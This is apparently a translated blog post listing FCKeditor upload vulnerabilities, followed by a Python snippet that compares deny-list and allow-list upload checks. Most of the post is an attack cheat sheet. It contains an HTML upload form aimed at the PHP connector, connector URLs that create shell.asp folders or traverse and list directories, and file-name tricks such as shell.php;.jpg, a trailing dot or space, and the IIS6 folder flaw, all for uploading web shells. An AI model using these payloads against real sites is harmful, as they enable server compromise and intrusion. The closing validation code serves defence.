FCKeditor upload vulnerabilities

1. Check the editor version
FCKeditor/_whatsnew.html
--------------------------------------

2. Version 2.2
Apache + Linux environment: upload a file with a "." appended to the file name to bypass the check. Tested.
--------------------------------------

3. Version <= 2.4.2: in the PHP connector, the Media type has no control over the uploaded file type, so a user can upload arbitrary files. Save the following as an HTML file and change the action address.
<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="POST">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
--------------------------------------

4. The FCKeditor workaround that replaces "." in file names with "_"
Uploaded files such as shell.php.rar or shell.php;.jpg often become shell_php.rar or shell_php;.jpg. This is a change in newer FCKeditor versions.
4.1: Submit shell.php followed by a space to bypass the rename. The space trick only works on Windows; *nix systems are not affected, because there shell.php and "shell.php " are two different files [not tested].
4.2: Keep uploading a file with the same name and it can become shell.php;(1).jpg. A new folder can also be created: only the first directory level is checked, so a second-level directory is not restricted.
--------------------------------------

5. Bypass by creating a folder
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
--------------------------------------

6. FCKeditor upload test files
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
--------------------------------------

7. Common upload addresses
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (tested on version 2.6.3)
JSP version:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
Note: the script-language part of the path (asp, php, jsp) must match the language the FCKeditor install actually uses; the Type value can be a folder name of your own choosing and can also use ../.. for directory traversal; www.site.com stands for the actual website address.
--------------------------------------

8. Other upload addresses
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
Many sites have removed the _samples directory, but it is worth checking.
FCKeditor/editor/fckeditor.html cannot upload a file by itself, but clicking the image upload button and then "Browse Server" jumps to a page from which files can be uploaded.
--------------------------------------

9. Directory listing vulnerability, which also helps find the upload address
Tested on version 2.4.1.
Modify the CurrentFolder parameter with ../../ to enter a different directory:
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
All of the site's directories can be read from the XML information returned.
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
The drive can be browsed directly:
JSP version:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
--------------------------------------

10. Path disclosure vulnerability
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
--------------------------------------

11. FCKeditor's passive (deny-list) restriction policy and the resulting lax filtering
Affected versions: FCKeditor <= v2.4.3
Vulnerability description:
In FCKeditor v2.4.3 the File type denies the following upload types by default:
HTML | HTM | PHP | PHP2 | PHP3 | php4 | php5 | phtml | pwml | inc | asp | aspx | ascx | jsp | cfm | cfc | pl | bat | exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh | shtml | shtm | phtm
FCKeditor 2.0 <= 2.2 allows uploading files with the asa, cer, php2, php4, inc, pwml and pht suffixes. After upload the file is stored directly with $sFilePath = $sServerDir . $sFileName, without using $sExtension, so on Windows a file name with a trailing "." can be uploaded to bypass the check [untested].
Under Apache, because of the Apache file-name parsing flaw, the other upload types defined by the TYPE variable can also be used to upload files; according to the FCKeditor code the File type has the narrowest restrictions.
If a script file can be uploaded directly, good; on versions that refuse it, append a "." or a space to the file name when uploading, or use the Windows Server 2003 (IIS 6) parsing flaw by creating an xxx.asp folder or uploading xx.asp;.jpg.
--------------------------------------

12. The oldest vulnerability: the Type parameter is not restricted at all
This was the first FCKeditor vulnerability I encountered. The version is unknown and must be very old, because the program does not check the Type=xxx parameter. Simply change Type=Image to Type=hsren in the upload request; this creates a folder called hsren as a new type with no restrictions, so any script can be uploaded.
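As an added illustration (not code from the original post or from FCKeditor), the Python below contrasts the deny-list behaviour the post describes (only the last extension is compared, and only for the File type) with an allow-list check, adds a CurrentFolder/NewFolderName check, and runs both over the file and folder names from sections 4, 5, 9, 11 and 12. The per-type allow-list policy and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Default deny list for the File type in FCKeditor 2.4.3, as quoted in section 11.
DENIED_EXTENSIONS = {
    "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc",
    "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll",
    "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm",
}
# Per-type allow list: a constructed policy for this example, not FCKeditor's own.
ALLOWED_EXTENSIONS = {"Image": {"jpg", "jpeg", "png", "gif"}, "File": {"pdf", "zip", "txt"}}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")   # one plain path or name component


def deny_list_check(filename: str, upload_type: str) -> bool:
    """Weak check modelled on the post: only the text after the last '.' is
    compared with the deny list, and only when Type=File (Media has no list)."""
    if upload_type != "File":
        return True                      # other types: no control at all
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext.lower() not in DENIED_EXTENSIONS   # "php " and "" slip through


def allow_list_check(filename: str, upload_type: str) -> bool:
    """Hardened check: known Type, no surrounding whitespace or separators,
    exactly one extension, and that extension allowed for the Type."""
    if upload_type not in ALLOWED_EXTENSIONS:
        return False                     # unknown Type (e.g. Type=hsren) is an error
    if filename != filename.strip() or "/" in filename or "\\" in filename:
        return False                     # trailing space, path separators
    base, dot, ext = filename.partition(".")
    if not dot or not SAFE_NAME.fullmatch(base) or not SAFE_NAME.fullmatch(ext):
        return False                     # "shell.php;.jpg", "shell.php." fail here
    return ext.lower() in ALLOWED_EXTENSIONS[upload_type]


def folder_check(current_folder: str, new_folder_name: str = "") -> bool:
    """Reject ../ traversal and dotted names (shell.asp) in CurrentFolder,
    and anything but a plain name in NewFolderName."""
    segments = [s for s in unquote(current_folder).replace("\\", "/").split("/") if s]
    if not all(SAFE_NAME.fullmatch(s) for s in segments):
        return False                     # ".." and "shell.asp" both fail SAFE_NAME
    return new_folder_name == "" or SAFE_NAME.fullmatch(new_folder_name) is not None


if __name__ == "__main__":
    for name in ["shell.php", "shell.php ", "shell.php;.jpg", "shell.php.", "photo.jpg"]:
        print(f"{name!r:18} deny-list={deny_list_check(name, 'File')!s:5} "
              f"allow-list={allow_list_check(name, 'Image')}")
```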

Origin blog.csdn.net/qiangge0906/article/details/83658415